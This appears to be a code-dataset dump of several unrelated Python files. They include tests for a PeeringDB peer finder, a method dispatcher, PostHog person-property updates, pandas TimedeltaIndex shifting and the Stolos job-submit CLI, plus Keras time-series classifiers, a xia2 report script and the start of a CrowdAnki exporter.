def test_fetch_common_facilities(self):
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
peer = [peerfinder.pdb_to_peer(self.peer, ixp, fac)]
expected = {"Test Facility"}
self.assertEqual(expected, peerfinder.fetch_common_facilities(peer))
@mock.patch.object(requests, "get", autospec=True)
def test_getPeeringDBSuccess(self, requests_mock):
r_mock = Mock()
r_mock.status_code = 200
r_mock.text = "some text"
r_mock.json.return_value = {"data": [0]}
requests_mock.return_value = r_mock
expected = {"data": [0]}
self.assertEqual(expected, peerfinder.getPeeringDB("23456"))
def test_fetch_fac_from_facilities(self):
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
fac_name = "Test Facility"
expected = peerfinder.Facility(name="Test Facility", ASN=65536)
self.assertEqual(expected, peerfinder.fetch_fac_from_facilities(fac_name, fac))
def test_fetch_different_ixps(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
expected = ["Test IX1", "Test IX2"]
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(name="peer2", ASN=1, present_in=[], peering_on=[ix2])
self.assertEqual(expected, peerfinder.fetch_different_ixps([peer1, peer2]))
def test_print_ixp(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(
name="peer2", ASN=1, present_in=[], peering_on=[ix1, ix2]
)
self.assertIsNone(peerfinder.print_ixp([peer1, peer2]))
def test_print_fac(self):
fac1 = peerfinder.Facility(name="Test Facility 1", ASN=1,)
fac2 = peerfinder.Facility(name="Test Facility 2", ASN=1,)
peer1 = peerfinder.Peer(
name="peer1", ASN=1, present_in=[fac1, fac2], peering_on=[]
)
peer2 = peerfinder.Peer(name="peer2", ASN=1, present_in=[fac1], peering_on=[])
self.assertIsNone(peerfinder.print_fac([peer1, peer2]))
def test_print_uncommon(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(
name="peer2", ASN=1, present_in=[], peering_on=[ix1, ix2]
)
self.assertIsNone(peerfinder.print_uncommon([peer1, peer2]))
if __name__ == "__main__":
unittest.main()
|
16543
|
import unittest
from ..dispatcher import Dispatcher
class Math:
@staticmethod
def sum(a, b):
return a + b
@classmethod
def diff(cls, a, b):
return a - b
def mul(self, a, b):
return a * b
class TestDispatcher(unittest.TestCase):
def test_empty(self):
self.assertEqual(len(Dispatcher()), 0)
def test_add_function(self):
d = Dispatcher()
@d.add_function
def one():
return 1
def two():
return 2
d.add_function(two)
d.add_function(two, name="two_alias")
self.assertIn("one", d)
self.assertEqual(d["one"](), 1)
self.assertIsNotNone(one) # do not remove function from the scope
self.assertIn("two", d)
self.assertIn("two_alias", d)
def test_class(self):
d1 = Dispatcher()
d1.add_class(Math)
self.assertIn("math.sum", d1)
self.assertIn("math.diff", d1)
self.assertIn("math.mul", d1)
self.assertEqual(d1["math.sum"](3, 8), 11)
self.assertEqual(d1["math.diff"](6, 9), -3)
self.assertEqual(d1["math.mul"](2, 3), 6)
d2 = Dispatcher(Math)
self.assertNotIn("__class__", d2)
self.assertEqual(d1.keys(), d2.keys())
for method in ["math.sum", "math.diff"]:
self.assertEqual(d1[method], d2[method])
def test_class_prefix(self):
d = Dispatcher(Math, prefix="")
self.assertIn("sum", d)
self.assertNotIn("math.sum", d)
def test_object(self):
math = Math()
d1 = Dispatcher()
d1.add_object(math)
self.assertIn("math.sum", d1)
self.assertIn("math.diff", d1)
self.assertEqual(d1["math.sum"](3, 8), 11)
self.assertEqual(d1["math.diff"](6, 9), -3)
d2 = Dispatcher(math)
self.assertNotIn("__class__", d2)
self.assertEqual(d1, d2)
def test_object_prefix(self):
d = Dispatcher(Math(), prefix="")
self.assertIn("sum", d)
self.assertNotIn("math.sum", d)
def test_add_dict(self):
d = Dispatcher()
d.add_prototype({"sum": lambda *args: sum(args)}, "util.")
self.assertIn("util.sum", d)
self.assertEqual(d["util.sum"](13, -2), 11)
def test_init_from_dict(self):
d = Dispatcher({
"one": lambda: 1,
"two": lambda: 2,
})
self.assertIn("one", d)
self.assertIn("two", d)
def test_del_method(self):
d = Dispatcher()
d["method"] = lambda: ""
self.assertIn("method", d)
del d["method"]
self.assertNotIn("method", d)
def test_to_dict(self):
d = Dispatcher()
def func():
return ""
d["method"] = func
self.assertEqual(dict(d), {"method": func})
def test__getattr_function(self):
# class
self.assertEqual(Dispatcher._getattr_function(Math, "sum")(3, 2), 5)
self.assertEqual(Dispatcher._getattr_function(Math, "diff")(3, 2), 1)
self.assertEqual(Dispatcher._getattr_function(Math, "mul")(3, 2), 6)
# object
self.assertEqual(Dispatcher._getattr_function(Math(), "sum")(3, 2), 5)
self.assertEqual(Dispatcher._getattr_function(Math(), "diff")(3, 2), 1)
self.assertEqual(Dispatcher._getattr_function(Math(), "mul")(3, 2), 6)
|
16573
|
from datetime import datetime
from django.db import connection
from posthog.models import Person
from posthog.test.base import BaseTest
# How we expect this function to behave:
# | call | value exists | call TS is ___ existing TS | previous fn | write/override
# 1| set | no | N/A | N/A | yes
# 2| set_once | no | N/A | N/A | yes
# 3| set | yes | before | set | no
# 4| set | yes | before | set_once | yes
# 5| set | yes | after | set | yes
# 6| set | yes | after | set_once | yes
# 7| set_once | yes | before | set | no
# 8| set_once | yes | before | set_once | yes
# 9| set_once | yes | after | set | no
# 10| set_once | yes | after | set_once | no
# 11| set | yes | equal | set | no
# 12| set_once | yes | equal | set | no
# 13| set | yes | equal | set_once | yes
# 14| set_once | yes | equal | set_once | no
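# For example, case 3: an incoming 'set' stamped 2000-01-01 must not overwrite a
# value whose last write was a 'set' at 2050-01-01, whereas case 4 shows the same
# call does overwrite when the previous write was only a 'set_once'.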
FUTURE_TIMESTAMP = datetime(2050, 1, 1, 1, 1, 1).isoformat()
PAST_TIMESTAMP = datetime(2000, 1, 1, 1, 1, 1).isoformat()
# Refers to migration 0176_update_person_props_function
# This is a Postgres function we use in the plugin server
class TestShouldUpdatePersonProp(BaseTest):
def test_update_without_properties_last_updated_at(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
        # the set_once call does not update b
self.assertEqual(updated_person.properties, {"a": 1, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertIsNotNone(updated_person.properties_last_updated_at["a"])
def test_update_without_properties_last_operation(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
        # the set_once call does not update b
self.assertEqual(updated_person.properties, {"a": 1, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set"})
self.assertNotEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
# tests cases 1 and 2 from the table
def test_update_non_existent_prop(self):
person = Person.objects.create(
team=self.team, properties={}, properties_last_updated_at={}, properties_last_operation={}
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# both updated
self.assertEqual(updated_person.properties, {"a": 1, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertIsNotNone(updated_person.properties_last_updated_at["a"])
self.assertIsNotNone(updated_person.properties_last_updated_at["b"])
    # tests cases 3 and 4 from the table
def test_set_operation_with_earlier_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# b updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set"})
self.assertEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], FUTURE_TIMESTAMP)
    # tests cases 5 and 6 from the table
def test_set_operation_with_older_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": PAST_TIMESTAMP, "b": PAST_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# both updated
self.assertEqual(updated_person.properties, {"a": 1, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set"})
self.assertNotEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
# tests cases 7 and 8 from the table
def test_set_once_operation_with_earlier_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set_once', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# b updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], FUTURE_TIMESTAMP)
# tests cases 9 and 10 from the table
def test_set_once_operation_with_older_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": PAST_TIMESTAMP, "b": PAST_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set_once', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# neither updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
    # tests cases 11-14 from the table
def test_equal_timestamps(self):
timestamp = PAST_TIMESTAMP
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0, "c": 0, "d": 0},
properties_last_updated_at={"a": timestamp, "b": timestamp, "c": timestamp, "d": timestamp},
properties_last_operation={"a": "set", "b": "set", "c": "set_once", "d": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
'{timestamp}',
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update,
row('set', 'c', '1'::jsonb)::person_property_update,
row('set_once', 'd', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
        # only "c" is written: the incoming op is set and the last op was set_once (case 13)
self.assertEqual(updated_person.properties, {"a": 0, "b": 0, "c": 1, "d": 0})
self.assertEqual(
updated_person.properties_last_operation, {"a": "set", "b": "set", "c": "set", "d": "set_once"}
) # c changed
self.assertEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["c"], PAST_TIMESTAMP)
        self.assertEqual(updated_person.properties_last_updated_at["d"], PAST_TIMESTAMP)
|
16583
|
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Flatten, Dropout, Input
from tensorflow.keras.layers import MaxPooling1D, Conv1D
from tensorflow.keras.layers import LSTM, Bidirectional
from tensorflow.keras.layers import BatchNormalization, GlobalAveragePooling1D, Permute, concatenate, Activation, add
import numpy as np
import math
def get_model(model_name, input_shape, nb_class):
if model_name == "vgg":
model = cnn_vgg(input_shape, nb_class)
elif model_name == "lstm1":
model = lstm1(input_shape, nb_class)
elif model_name == "lstm":
model = lstm1v0(input_shape, nb_class)
elif model_name == "lstm2":
model = lstm2(input_shape, nb_class)
elif model_name == "blstm1":
model = blstm1(input_shape, nb_class)
elif model_name == "blstm2":
model = blstm2(input_shape, nb_class)
elif model_name == "lstmfcn":
model = lstm_fcn(input_shape, nb_class)
elif model_name == "resnet":
model = cnn_resnet(input_shape, nb_class)
elif model_name == "mlp":
model = mlp4(input_shape, nb_class)
elif model_name == "lenet":
model = cnn_lenet(input_shape, nb_class)
else:
print("model name missing")
return model
def mlp4(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, "Time Series Classification from Scratch with Deep Neural Networks: A Strong Baseline," Int. Joint Conf. Neural Networks, 2017, pp. 1578-1585
ip = Input(shape=input_shape)
fc = Flatten()(ip)
fc = Dropout(0.1)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.3)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_lenet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “Gradient-based learning applied to document recognition,” Proceedings of the IEEE, vol. 86, no. 11, pp. 2278–2324, 1998.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
conv = Conv1D(6+10*i, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(120, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(84, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_vgg(input_shape, nb_class):
# <NAME> and <NAME>, "Very deep convolutional networks for large-scale image recognition," arXiv preprint arXiv:1409.1556, 2014.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
num_filters = min(64*2**i, 512)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
if i > 1:
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(4096, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(4096, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def lstm1v0(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
ip = Input(shape=input_shape)
l2 = LSTM(512)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = LSTM(100)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = LSTM(100, return_sequences=True)(ip)
l2 = LSTM(100)(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Bidirectional recurrent neural networks,” IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673–2681, 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = Bidirectional(LSTM(100))(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = Bidirectional(LSTM(100, return_sequences=True))(ip)
l2 = Bidirectional(LSTM(100))(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm_fcn(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “LSTM Fully Convolutional Networks for Time Series Classification,” IEEE Access, vol. 6, pp. 1662–1669, 2018.
ip = Input(shape=input_shape)
    # The LSTM branch operates on the transposed input (a single time step with many features), the dimension shuffle described in Karim et al.
lstm = Permute((2, 1))(ip)
lstm = LSTM(128)(lstm)
lstm = Dropout(0.8)(lstm)
conv = Conv1D(128, 8, padding='same', kernel_initializer='he_uniform')(ip)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
flat = GlobalAveragePooling1D()(conv)
flat = concatenate([lstm, flat])
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
def cnn_resnet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, "Data augmentation using synthetic data for time series classification with deep residual networks," International Workshop on Advanced Analytics and Learning on Temporal Data ECML/PKDD, 2018
ip = Input(shape=input_shape)
residual = ip
conv = ip
for i, nb_nodes in enumerate([64, 128, 128]):
conv = Conv1D(nb_nodes, 8, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 5, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 3, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
if i < 2:
# expands dimensions according to Fawaz et al.
residual = Conv1D(nb_nodes, 1, padding='same', kernel_initializer="glorot_uniform")(residual)
residual = BatchNormalization()(residual)
conv = add([residual, conv])
conv = Activation('relu')(conv)
residual = conv
flat = GlobalAveragePooling1D()(conv)
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
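if __name__ == "__main__":
    # Minimal smoke test (not part of the original module): build the MLP
    # baseline for a univariate series of length 128 with 3 classes.
    model = get_model("mlp", input_shape=(128, 1), nb_class=3)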
|
16590
|
import json
import os
import sys
from collections import OrderedDict
import iotbx.phil
import xia2.Handlers.Streams
from dials.util.options import OptionParser
from jinja2 import ChoiceLoader, Environment, PackageLoader
from xia2.Modules.Report import Report
from xia2.XIA2Version import Version
phil_scope = iotbx.phil.parse(
"""\
title = 'xia2 report'
.type = str
prefix = 'xia2'
.type = str
log_include = None
.type = path
include scope xia2.Modules.Analysis.phil_scope
json {
indent = None
.type = int(value_min=0)
}
""",
process_includes=True,
)
help_message = """
"""
def run(args):
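    # Parse the scaled unmerged MTZ into a Report, collect the resolution,
    # batch and intensity statistics plots, render them through the xia2/dials
    # Jinja templates, and write both an HTML report and a JSON dump of the
    # underlying plot data.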
usage = "xia2.report [options] scaled_unmerged.mtz"
parser = OptionParser(
usage=usage, phil=phil_scope, check_format=False, epilog=help_message
)
params, options, args = parser.parse_args(
show_diff_phil=True, return_unhandled=True
)
if len(args) == 0:
parser.print_help()
return
unmerged_mtz = args[0]
report = Report.from_unmerged_mtz(unmerged_mtz, params, report_dir=".")
# xtriage
xtriage_success, xtriage_warnings, xtriage_danger = None, None, None
if params.xtriage_analysis:
try:
xtriage_success, xtriage_warnings, xtriage_danger = report.xtriage_report()
except Exception as e:
params.xtriage_analysis = False
print("Exception runnning xtriage:")
print(e)
json_data = {}
if params.xtriage_analysis:
json_data["xtriage"] = xtriage_success + xtriage_warnings + xtriage_danger
(
overall_stats_table,
merging_stats_table,
stats_plots,
) = report.resolution_plots_and_stats()
json_data.update(stats_plots)
json_data.update(report.batch_dependent_plots())
json_data.update(report.intensity_stats_plots(run_xtriage=False))
json_data.update(report.pychef_plots())
resolution_graphs = OrderedDict(
(k, json_data[k])
for k in (
"cc_one_half",
"i_over_sig_i",
"second_moments",
"wilson_intensity_plot",
"completeness",
"multiplicity_vs_resolution",
)
if k in json_data
)
if params.include_radiation_damage:
batch_graphs = OrderedDict(
(k, json_data[k])
for k in (
"scale_rmerge_vs_batch",
"i_over_sig_i_vs_batch",
"completeness_vs_dose",
"rcp_vs_dose",
"scp_vs_dose",
"rd_vs_batch_difference",
)
)
else:
batch_graphs = OrderedDict(
(k, json_data[k])
for k in ("scale_rmerge_vs_batch", "i_over_sig_i_vs_batch")
)
misc_graphs = OrderedDict(
(k, json_data[k])
for k in ("cumulative_intensity_distribution", "l_test", "multiplicities")
if k in json_data
)
for k, v in report.multiplicity_plots().items():
misc_graphs[k] = {"img": v}
styles = {}
for axis in ("h", "k", "l"):
styles["multiplicity_%s" % axis] = "square-plot"
loader = ChoiceLoader(
[PackageLoader("xia2", "templates"), PackageLoader("dials", "templates")]
)
env = Environment(loader=loader)
if params.log_include:
with open(params.log_include, "rb") as fh:
log_text = fh.read().decode("utf-8")
else:
log_text = ""
template = env.get_template("report.html")
html = template.render(
page_title=params.title,
filename=os.path.abspath(unmerged_mtz),
space_group=report.intensities.space_group_info().symbol_and_number(),
unit_cell=str(report.intensities.unit_cell()),
mtz_history=[h.strip() for h in report.mtz_object.history()],
xtriage_success=xtriage_success,
xtriage_warnings=xtriage_warnings,
xtriage_danger=xtriage_danger,
overall_stats_table=overall_stats_table,
merging_stats_table=merging_stats_table,
cc_half_significance_level=params.cc_half_significance_level,
resolution_graphs=resolution_graphs,
batch_graphs=batch_graphs,
misc_graphs=misc_graphs,
styles=styles,
xia2_version=Version,
log_text=log_text,
)
with open("%s-report.json" % params.prefix, "w") as fh:
json.dump(json_data, fh, indent=params.json.indent)
with open("%s-report.html" % params.prefix, "wb") as fh:
fh.write(html.encode("utf-8", "xmlcharrefreplace"))
def run_with_log():
xia2.Handlers.Streams.setup_logging(
logfile="xia2.report.txt", debugfile="xia2.report-debug.txt"
)
run(sys.argv[1:])
|
16627
|
import pytest
from pandas.errors import NullFrequencyError
import pandas as pd
from pandas import TimedeltaIndex
import pandas._testing as tm
class TestTimedeltaIndexShift:
# -------------------------------------------------------------
# TimedeltaIndex.shift is used by __add__/__sub__
def test_tdi_shift_empty(self):
# GH#9903
idx = pd.TimedeltaIndex([], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
tm.assert_index_equal(idx.shift(3, freq="H"), idx)
def test_tdi_shift_hours(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
exp = pd.TimedeltaIndex(["8 hours", "9 hours", "12 hours"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="H"), exp)
exp = pd.TimedeltaIndex(["2 hours", "3 hours", "6 hours"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="H"), exp)
def test_tdi_shift_minutes(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="T"), idx)
exp = pd.TimedeltaIndex(["05:03:00", "06:03:00", "9:03:00"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="T"), exp)
exp = pd.TimedeltaIndex(["04:57:00", "05:57:00", "8:57:00"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="T"), exp)
def test_tdi_shift_int(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(1)
expected = TimedeltaIndex(
[
"1 days 01:00:00",
"2 days 01:00:00",
"3 days 01:00:00",
"4 days 01:00:00",
"5 days 01:00:00",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_tdi_shift_nonstandard_freq(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(3, freq="2D 1s")
expected = TimedeltaIndex(
[
"6 days 01:00:03",
"7 days 01:00:03",
"8 days 01:00:03",
"9 days 01:00:03",
"10 days 01:00:03",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_shift_no_freq(self):
# GH#19147
tdi = TimedeltaIndex(["1 days 01:00:00", "2 days 01:00:00"], freq=None)
with pytest.raises(NullFrequencyError, match="Cannot shift with no freq"):
tdi.shift(2)
|
16629
|
import os
from subprocess import check_output, CalledProcessError
from nose import tools as nt
from stolos import queue_backend as qb
from stolos.testing_tools import (
with_setup, validate_zero_queued_task, validate_one_queued_task,
validate_n_queued_task
)
def run(cmd, tasks_json_tmpfile, **kwargs):
cmd = (
"set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(
cmd=cmd, tasks_json=tasks_json_tmpfile, **kwargs)
rv = check_output(cmd, shell=True, executable="bash", env=os.environ)
return rv
@with_setup
def test_stolos_submit(app1, job_id1, tasks_json_tmpfile):
with nt.assert_raises(CalledProcessError):
run("stolos-submit -h", tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_readd(app1, job_id1, tasks_json_tmpfile):
qb.set_state(app1, job_id1, failed=True)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1),
tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s --readd" % (app1, job_id1),
tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_multiple_jobs(app1, app2, job_id1, job_id2,
tasks_json_tmpfile):
validate_zero_queued_task(app1)
validate_zero_queued_task(app2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
|
16633
|
from pathlib import Path
from .anki_exporter import AnkiJsonExporter
from ..anki.adapters.anki_deck import AnkiDeck
from ..config.config_settings import ConfigSettings
from ..utils import constants
from ..utils.notifier import AnkiModalNotifier, Notifier
from ..utils.disambiguate_uuids import disambiguate_note_model_uuids
EXPORT_FAILED_TITLE = "Export failed"
class AnkiJsonExporterWrapper:
"""
Wrapper designed to work with standard export dialog in anki.
"""
key = "CrowdAnki JSON representation"
ext = constants.ANKI_EXPORT_EXTENSION
hideTags = True
includeTags = True
directory_export = True
def __init__(self, collection,
deck_id: int = None,
